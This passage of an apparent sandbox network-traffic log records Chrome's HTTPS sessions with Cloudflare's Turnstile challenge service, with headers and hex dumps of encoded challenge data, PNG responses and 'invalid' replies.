                                                                                        cf-chl-out: JH6IfFNIDAxz6//NeoU/AR2VEROGeYm64yo=$O8O7EqopsE58zDBu
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2869eff042ac-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.449771104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:56 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f6f283fab80c461/1735028274208/0c794be9e99943a3c3c5c96ce0a6874a8ab0d195fbf88e0680b941f8e8598dee/E4LtmRjqgUWrvFG HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:57 UTC143INHTTP/1.1 401 Unauthorized
                                                                                        Date: Tue, 24 Dec 2024 08:17:57 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 1
                                                                                        Connection: close
                                                                                        2024-12-24 08:17:57 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 44 48 6c 4c 36 65 6d 5a 51 36 50 44 78 63 6c 73 34 4b 61 48 53 6f 71 77 30 5a 58 37 2d 49 34 47 67 4c 6c 42 2d 4f 68 5a 6a 65 34 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gDHlL6emZQ6PDxcls4KaHSoqw0ZX7-I4GgLlB-OhZje4AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                        2024-12-24 08:17:57 UTC1INData Raw: 4a
                                                                                        Data Ascii: J


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.449776104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:17:59 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUod HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:17:59 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:17:59 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2879fe9b42b2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:17:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 33 08 02 00 00 00 4d 23 5c 8a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR83M#\IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.449779104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:18:01 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 31279
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:18:01 UTC16384OUTData Raw: 76 5f 38 66 36 66 32 38 33 66 61 62 38 30 63 34 36 31 3d 4f 6c 30 7a 24 76 48 5a 57 68 6c 48 57 6a 5a 48 77 32 73 32 67 6a 6f 48 4a 32 56 7a 6a 58 68 6f 32 37 32 54 72 68 75 48 41 37 32 48 4e 4e 57 47 54 48 43 32 36 46 72 41 54 4b 48 64 6f 32 68 49 32 41 75 32 66 7a 47 6f 6f 6f 46 76 32 76 64 32 6e 72 41 44 6b 6f 32 41 6f 32 74 62 7a 57 32 4c 64 4c 7a 6e 72 32 50 7a 76 59 68 32 74 39 49 68 79 54 2d 4b 30 30 32 6a 46 77 4e 7a 48 70 2d 4b 6b 79 48 63 71 72 58 51 58 58 32 48 39 7a 48 31 6f 48 66 4c 32 41 4b 32 5a 72 32 78 30 7a 6e 32 46 38 76 58 34 66 72 32 52 66 24 42 69 4f 24 6c 38 30 32 74 71 66 39 72 57 7a 39 6a 77 66 30 5a 32 47 4b 6e 6a 41 7a 6a 71 7a 57 72 34 56 49 78 32 41 4f 68 65 77 42 76 6b 70 69 4e 39 57 48 4f 71 31 67 4c 73 33 71 77 31 33 69 46
                                                                                        Data Ascii: v_8f6f283fab80c461=Ol0z$vHZWhlHWjZHw2s2gjoHJ2VzjXho272TrhuHA72HNNWGTHC26FrATKHdo2hI2Au2fzGoooFv2vd2nrADko2Ao2tbzW2LdLznr2PzvYh2t9IhyT-K002jFwNzHp-KkyHcqrXQXX2H9zH1oHfL2AK2Zr2x0zn2F8vX4fr2Rf$BiO$l802tqf9rWz9jwf0Z2GKnjAzjqzWr4VIx2AOhewBvkpiN9WHOq1gLs3qw13iF
                                                                                        2024-12-24 08:18:01 UTC14895OUTData Raw: 63 39 4c 49 6b 32 39 7a 43 7a 2d 56 76 4e 41 4d 49 2d 75 4e 39 71 58 32 55 34 35 2b 47 58 69 32 6a 7a 48 6f 32 36 32 76 61 48 4b 32 4f 7a 68 66 48 75 58 6a 32 6f 54 32 4e 32 2d 32 48 57 32 69 56 37 32 47 57 48 2d 55 52 7a 48 61 48 45 32 74 4e 49 6f 32 38 32 56 32 48 75 32 2b 57 6a 58 41 6e 48 4f 32 73 58 41 6c 32 2b 32 58 72 76 52 32 79 32 46 72 48 4b 32 4d 32 66 72 68 5a 32 4a 32 41 72 47 32 76 5a 32 75 32 6f 32 76 4a 55 6f 32 44 58 48 79 32 56 32 6a 72 32 6c 32 32 7a 41 76 48 54 32 72 58 48 57 32 72 7a 66 57 76 58 76 57 6c 48 75 6a 72 32 46 32 52 32 30 6f 48 50 32 61 58 76 75 32 56 6f 2d 32 30 79 48 37 72 6f 32 48 79 32 41 32 54 72 76 7a 48 51 34 64 7a 6f 72 49 4e 32 65 72 47 4a 32 62 32 52 50 48 57 41 2d 32 56 32 6a 37 38 58 54 44 6e 47 51 32 35 32 76
                                                                                        Data Ascii: c9LIk29zCz-VvNAMI-uN9qX2U45+GXi2jzHo262vaHK2OzhfHuXj2oT2N2-2HW2iV72GWH-URzHaHE2tNIo282V2Hu2+WjXAnHO2sXAl2+2XrvR2y2FrHK2M2frhZ2J2ArG2vZ2u2o2vJUo2DXHy2V2jr2l22zAvHT2rXHW2rzfWvXvWlHujr2F2R20oHP2aXvu2Vo-20yH7ro2Hy2A2TrvzHQ4dzorIN2erGJ2b2RPHWA-2V2j78XTDnGQ252v
                                                                                        2024-12-24 08:18:01 UTC330INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:18:01 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 26320
                                                                                        Connection: close
                                                                                        cf-chl-gen: v/kdpPwC6V5gZjeX+w97bDO2aD7siOVwlO25vz6msfKWiYZeWRvPboNc2cMiVtXVp/8ORPyyQU9xs3Dy$Gwna51c8bko3+uJg
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2886df3443e0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:18:01 UTC1039INData Raw: 64 62 79 77 6e 71 47 33 68 49 57 79 6c 35 6d 44 73 34 6d 5a 71 38 71 6c 30 5a 2f 53 7a 59 36 6a 31 74 47 4f 74 4e 6e 57 78 62 79 58 6d 39 37 50 79 70 71 39 34 4e 61 33 70 64 72 67 34 75 47 38 35 2b 50 43 7a 4d 66 4e 38 76 50 50 35 37 4f 79 7a 4c 4c 59 79 2f 54 56 39 4c 66 54 7a 64 6a 7a 30 4e 76 37 33 67 6a 2b 35 76 6a 6e 36 67 66 48 35 65 72 66 39 65 6e 52 44 41 72 78 39 76 33 71 45 75 6a 32 41 75 41 65 41 4f 44 63 2f 64 38 49 4b 75 49 6a 4a 75 67 49 4b 65 38 72 48 53 34 65 4d 69 45 48 4d 54 54 35 4d 66 6f 72 4b 68 49 61 4e 6b 51 45 41 53 63 35 48 51 45 30 42 67 5a 46 55 43 52 4f 55 44 4d 2b 46 43 64 55 46 53 39 4a 4e 42 63 71 4d 52 46 58 4c 46 31 66 55 30 39 57 4e 6d 64 6e 56 54 74 6f 59 32 4a 41 53 47 78 44 5a 48 56 6e 59 6b 51 34 4d 33 74 37 58 44 52
                                                                                        Data Ascii: dbywnqG3hIWyl5mDs4mZq8ql0Z/SzY6j1tGOtNnWxbyXm97Pypq94Na3pdrg4uG85+PCzMfN8vPP57OyzLLYy/TV9LfTzdjz0Nv73gj+5vjn6gfH5erf9enRDArx9v3qEuj2AuAeAODc/d8IKuIjJugIKe8rHS4eMiEHMTT5MforKhIaNkQEASc5HQE0BgZFUCROUDM+FCdUFS9JNBcqMRFXLF1fU09WNmdnVTtoY2JASGxDZHVnYkQ4M3t7XDR
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 47 75 70 36 6b 6a 62 2b 68 77 6f 72 41 30 5a 4c 59 75 4c 54 46 75 4a 54 5a 72 73 71 79 79 75 43 66 6f 36 48 48 76 2b 4f 71 76 4c 6a 69 37 39 6a 66 75 61 54 44 72 65 61 76 33 37 61 76 32 39 76 59 74 39 2f 39 7a 76 37 41 75 74 76 42 39 4e 71 2b 32 4d 66 68 42 63 6e 62 78 51 7a 52 38 52 48 76 30 4e 4c 77 35 39 62 75 42 74 59 49 2b 64 34 66 41 51 41 59 45 65 51 5a 49 69 4d 49 41 53 48 6f 42 65 67 4a 37 68 6f 69 38 4f 34 72 4a 51 38 47 4d 79 73 38 43 6a 6b 4c 2f 42 41 50 4c 44 41 78 48 44 73 58 4f 43 73 33 50 44 30 66 4b 54 31 47 51 44 38 6b 46 46 45 33 52 69 56 4a 56 6c 55 37 56 78 30 2f 4f 56 46 54 4f 44 63 75 57 79 55 34 58 44 6c 64 52 57 35 62 51 55 31 4f 61 32 46 52 62 55 64 31 4d 30 5a 4e 64 45 6c 4d 52 32 78 74 58 30 74 35 59 31 42 78 63 32 5a 6e 69 49
                                                                                        Data Ascii: Gup6kjb+hworA0ZLYuLTFuJTZrsqyyuCfo6HHv+OqvLji79jfuaTDreav37av29vYt9/9zv7AutvB9Nq+2MfhBcnbxQzR8RHv0NLw59buBtYI+d4fAQAYEeQZIiMIASHoBegJ7hoi8O4rJQ8GMys8CjkL/BAPLDAxHDsXOCs3PD0fKT1GQD8kFFE3RiVJVlU7Vx0/OVFTODcuWyU4XDldRW5bQU1Oa2FRbUd1M0ZNdElMR2xtX0t5Y1Bxc2ZniI
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 79 6f 7a 42 78 37 65 75 70 64 6e 62 72 6f 2b 76 30 36 37 63 32 61 2b 78 73 74 2b 2f 70 61 53 2f 78 2b 33 61 78 71 33 6b 75 75 2b 70 73 4b 66 7a 30 2b 61 35 73 38 2f 58 76 4e 61 36 76 75 76 79 42 66 37 42 2f 4e 54 61 2f 4f 59 4d 32 77 6a 6f 42 65 66 72 42 75 76 73 34 67 2f 53 47 68 48 6a 30 51 37 62 41 4e 76 36 44 42 67 6a 47 78 55 53 4a 65 41 70 34 2b 6b 48 42 67 33 6e 4a 42 4c 2b 37 78 30 77 41 44 45 42 4d 43 51 6e 44 54 50 31 46 51 6b 62 48 6b 4d 34 48 7a 63 49 4a 6a 59 45 46 42 6b 62 48 79 52 52 52 54 4e 49 4a 55 73 53 52 43 74 43 55 56 42 48 54 6c 45 71 53 31 31 6a 4d 57 55 38 4f 56 42 41 57 79 64 73 52 46 35 4a 49 6c 4a 4c 53 69 70 6d 53 6d 52 72 61 6e 64 7a 5a 6a 31 54 56 58 67 35 50 33 31 6b 51 46 78 78 58 34 6d 45 59 49 71 46 62 34 35 69 53 34 6c
                                                                                        Data Ascii: yozBx7eupdnbro+v067c2a+xst+/paS/x+3axq3kuu+psKfz0+a5s8/XvNa6vuvyBf7B/NTa/OYM2wjoBefrBuvs4g/SGhHj0Q7bANv6DBgjGxUSJeAp4+kHBg3nJBL+7x0wADEBMCQnDTP1FQkbHkM4HzcIJjYEFBkbHyRRRTNIJUsSRCtCUVBHTlEqS11jMWU8OVBAWydsRF5JIlJLSipmSmRrandzZj1TVXg5P31kQFxxX4mEYIqFb45iS4l
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 35 58 46 72 72 61 79 71 62 57 75 77 37 57 6a 73 4e 37 43 73 38 4f 63 30 37 71 6d 75 37 72 76 36 38 33 70 31 4f 66 6c 39 73 61 34 74 4f 72 52 39 50 79 32 39 38 44 57 2f 50 7a 67 33 39 33 69 78 77 58 6e 2b 39 76 39 7a 76 44 62 37 50 44 6d 36 41 4c 4f 35 78 59 54 45 4e 73 59 43 50 30 66 47 77 77 63 48 4e 34 66 38 51 6e 30 4b 69 62 38 48 66 66 6f 43 2b 72 6b 4a 66 51 48 4c 77 76 7a 43 44 72 34 4e 44 4d 76 44 41 6b 36 44 76 6b 6a 48 42 72 2b 43 53 55 6a 50 69 59 36 49 78 34 73 53 41 6b 4c 4e 6a 64 41 53 54 68 53 46 78 6c 59 56 68 30 30 47 54 51 78 54 43 49 6b 50 30 68 45 57 43 52 4d 62 69 6c 64 55 45 78 67 55 56 52 32 4d 54 39 59 56 47 63 30 58 48 35 2f 62 58 34 2f 66 33 42 65 56 6b 52 46 61 55 52 6e 67 32 42 44 61 6e 42 63 62 6d 68 6d 5a 45 31 6a 6c 6f 52 79
                                                                                        Data Ascii: 5XFrrayqbWuw7WjsN7Cs8Oc07qmu7rv683p1Ofl9sa4tOrR9Py298DW/Pzg393ixwXn+9v9zvDb7PDm6ALO5xYTENsYCP0fGwwcHN4f8Qn0Kib8HffoC+rkJfQHLwvzCDr4NDMvDAk6DvkjHBr+CSUjPiY6Ix4sSAkLNjdASThSFxlYVh00GTQxTCIkP0hEWCRMbildUExgUVR2MT9YVGc0XH5/bX4/f3BeVkRFaURng2BDanBcbmhmZE1jloRy
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 72 52 77 5a 72 53 6c 38 4f 34 35 72 62 56 32 4f 53 73 77 36 57 69 73 61 54 66 35 62 33 76 31 2b 66 47 36 62 72 58 79 4d 65 2b 31 73 33 77 2f 64 7a 53 39 39 58 56 42 66 6a 59 33 75 4c 4f 78 75 6b 4d 35 4d 58 4f 43 65 55 4d 43 51 6a 77 38 66 6f 53 31 65 38 63 2b 41 50 76 46 79 59 6b 45 76 48 69 47 51 44 32 41 53 38 43 37 69 6f 64 2f 50 45 46 39 66 48 33 41 7a 44 37 48 52 34 62 2b 44 6b 66 44 44 67 74 49 30 67 41 4d 69 4d 38 4e 7a 6b 68 4b 69 55 76 4d 53 34 67 56 6a 51 4f 47 43 4d 77 58 42 4e 65 50 43 78 4c 53 54 64 57 57 7a 34 39 52 55 56 64 53 6b 59 73 4f 30 52 69 53 56 4a 4e 50 6e 4e 54 56 57 67 30 55 6c 56 58 50 47 56 64 63 6e 70 38 57 54 74 32 50 47 4e 55 57 45 68 71 66 57 79 4c 5a 6f 47 4f 54 33 4b 47 62 58 35 75 69 49 74 7a 63 56 4f 48 65 48 70 70 57
                                                                                        Data Ascii: rRwZrSl8O45rbV2OSsw6WisaTf5b3v1+fG6brXyMe+1s3w/dzS99XVBfjY3uLOxukM5MXOCeUMCQjw8foS1e8c+APvFyYkEvHiGQD2AS8C7iod/PEF9fH3AzD7HR4b+DkfDDgtI0gAMiM8NzkhKiUvMS4gVjQOGCMwXBNePCxLSTdWWz49RUVdSkYsO0RiSVJNPnNTVWg0UlVXPGVdcnp8WTt2PGNUWEhqfWyLZoGOT3KGbX5uiItzcVOHeHppW
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 5a 73 36 6e 57 36 4f 69 74 78 63 47 6e 73 4e 72 70 77 62 4f 31 73 4f 37 79 39 4e 4c 47 2b 64 62 52 76 66 72 38 30 62 71 2f 38 4f 48 47 41 77 62 46 31 51 72 68 2b 64 77 4e 32 75 72 4e 33 75 77 56 46 64 59 49 35 64 50 50 48 42 6b 64 33 2f 67 56 32 2b 51 67 41 79 67 69 47 51 73 71 4c 78 63 67 4c 54 44 78 42 76 44 39 4d 44 41 31 4f 43 54 78 4b 44 30 53 50 44 33 37 4c 52 49 41 51 55 55 6a 51 67 6e 38 42 78 63 4b 41 51 31 50 54 53 6f 6e 56 52 4e 46 4c 78 49 6a 4c 56 49 71 48 42 34 5a 56 31 74 64 4f 79 39 69 50 7a 6f 6d 59 32 55 36 49 79 68 5a 53 69 39 72 62 69 34 2b 63 6b 70 69 52 58 56 53 54 33 30 37 4d 54 74 4c 51 47 39 77 67 30 53 44 52 6e 39 53 68 34 6d 49 56 6f 31 61 69 56 74 2f 53 6d 71 4f 61 56 5a 6b 6d 4a 53 4f 5a 35 71 58 58 6d 71 66 59 31 35 78 6f 6d
                                                                                        Data Ascii: Zs6nW6OitxcGnsNrpwbO1sO7y9NLG+dbRvfr80bq/8OHGAwbF1Qrh+dwN2urN3uwVFdYI5dPPHBkd3/gV2+QgAygiGQsqLxcgLTDxBvD9MDA1OCTxKD0SPD37LRIAQUUjQgn8BxcKAQ1PTSonVRNFLxIjLVIqHB4ZV1tdOy9iPzomY2U6IyhZSi9rbi4+ckpiRXVST307MTtLQG9wg0SDRn9Sh4mIVo1aiVt/SmqOaVZkmJSOZ5qXXmqfY15xom
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 78 4f 54 6c 72 74 36 74 36 37 50 6b 77 76 47 33 35 39 4c 30 75 72 54 61 2f 4c 38 41 32 76 33 4e 33 41 55 42 79 4c 7a 34 42 73 33 6b 79 51 6a 50 36 42 4c 63 30 73 7a 75 7a 39 59 58 46 52 58 61 30 43 45 57 33 69 48 75 49 65 4c 59 48 53 44 6e 41 65 6b 6c 36 78 73 64 4b 2f 6b 4a 38 53 76 78 36 44 45 36 39 65 77 31 4e 2f 73 72 4d 67 6b 41 50 7a 6c 41 42 42 30 35 41 41 59 42 49 30 6b 4c 54 52 74 4e 45 69 6b 53 54 78 52 44 57 56 55 58 4d 56 6c 57 4a 6a 55 61 58 52 34 5a 4f 31 77 6b 55 32 6b 67 4b 45 46 71 4e 53 78 62 4b 6d 63 75 4a 57 6c 74 4d 30 31 74 63 44 64 35 52 33 67 36 4d 58 31 35 51 46 6c 39 65 6b 5a 64 68 59 42 53 59 55 61 46 54 47 57 52 6a 45 35 46 55 6b 78 55 62 59 5a 68 56 33 47 64 6e 6c 74 31 6a 5a 68 66 57 58 75 66 5a 61 56 7a 70 57 65 58 6d 61 4e
                                                                                        Data Ascii: xOTlrt6t67PkwvG359L0urTa/L8A2v3N3AUByLz4Bs3kyQjP6BLc0szuz9YXFRXa0CEW3iHuIeLYHSDnAekl6xsdK/kJ8Svx6DE69ew1N/srMgkAPzlABB05AAYBI0kLTRtNEikSTxRDWVUXMVlWJjUaXR4ZO1wkU2kgKEFqNSxbKmcuJWltM01tcDd5R3g6MX15QFl9ekZdhYBSYUaFTGWRjE5FUkxUbYZhV3Gdnlt1jZhfWXufZaVzpWeXmaN
                                                                                        2024-12-24 08:18:01 UTC1369INData Raw: 4f 37 6b 30 75 6a 42 30 4d 66 48 78 64 54 4b 76 62 33 74 31 76 47 33 41 4e 72 37 30 51 6e 57 2b 4d 58 35 43 65 66 5a 45 64 37 30 7a 51 49 52 37 2b 45 5a 35 67 33 62 33 68 4c 6f 33 42 2f 56 49 4f 37 38 39 2f 44 6e 47 51 4d 48 4a 77 63 4c 49 66 6b 4a 4d 54 44 39 39 67 6f 30 41 78 45 4d 42 66 73 37 2b 67 77 4b 46 30 56 43 50 7a 55 6a 4f 52 49 68 49 77 6f 4b 4a 43 41 64 43 30 42 4e 52 67 31 53 54 52 59 57 49 7a 41 6f 4a 6a 55 7a 58 68 78 68 4c 31 49 6b 47 54 41 78 4a 55 45 69 59 44 5a 46 54 32 35 72 59 55 39 70 50 6b 31 45 52 45 4a 52 5a 58 6f 35 66 55 74 79 51 44 56 63 54 55 4a 64 50 6d 70 53 59 49 47 4b 68 33 31 72 67 46 70 6e 6b 6d 43 50 56 31 4a 32 57 47 39 53 6d 70 65 4e 65 34 4a 71 65 46 36 43 5a 48 74 6e 64 48 4b 41 5a 6f 70 72 62 6d 61 75 71 36 47 50
                                                                                        Data Ascii: O7k0ujB0MfHxdTKvb3t1vG3ANr70QnW+MX5CefZEd70zQIR7+EZ5g3b3hLo3B/VIO789/DnGQMHJwcLIfkJMTD99go0AxEMBfs7+gwKF0VCPzUjORIhIwoKJCAdC0BNRg1STRYWIzAoJjUzXhxhL1IkGTAxJUEiYDZFT25rYU9pPk1EREJRZXo5fUtyQDVcTUJdPmpSYIGKh31rgFpnkmCPV1J2WG9SmpeNe4JqeF6CZHtndHKAZoprbmauq6GP


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.449780104.18.95.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:18:01 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUod HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:18:01 UTC200INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 08:18:01 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f2887fbad43cf-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:18:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 33 08 02 00 00 00 4d 23 5c 8a 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDR83M#\IDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.449782104.18.95.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 08:18:03 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-24 08:18:03 UTC379INHTTP/1.1 404 Not Found
                                                                                        Date: Tue, 24 Dec 2024 08:18:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: AXkoIWPg4j6LAK5SHuvaxqO8dOZtnJGZCJ4=$KrlFAmnqGvLSROO5
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6f28947bce0f6f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-24 08:18:03 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.450034104.18.94.414434588C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
